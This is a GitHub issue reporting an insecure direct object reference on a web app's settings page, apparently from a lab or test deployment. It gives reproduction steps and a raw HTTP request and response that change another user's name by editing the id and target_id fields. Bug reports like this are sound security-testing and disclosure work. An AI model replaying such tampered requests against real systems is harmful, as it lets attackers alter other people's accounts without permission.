Skip to content

IDOR on settings page #2

New issue
New issue
Open
Open
IDOR on settings page#2
@jeremybuis

Description

@jeremybuis
jeremybuis
opened on Oct 26, 2017

Steps to reproduce:

  1. Login as a normal user
  2. Update your settings
  3. Capture the request using an intercepting proxy
  4. Resend the request after updating the id and target_id and name field to another user
  5. Navigate to the other users wall and see that their name has been changed

Attack Request:

POST /settings?id=486 HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

regLastName=Test&regPassword=&regDOB=1995-09-01&regEmail=jbuis@softwaresecured.com&regUsername=otest&regFirstName=Olivia&target_id=486&regPasswordConfirm=

Attack Response:

HTTP/1.1 302 
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 14:01:09 GMT
Connection: close

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions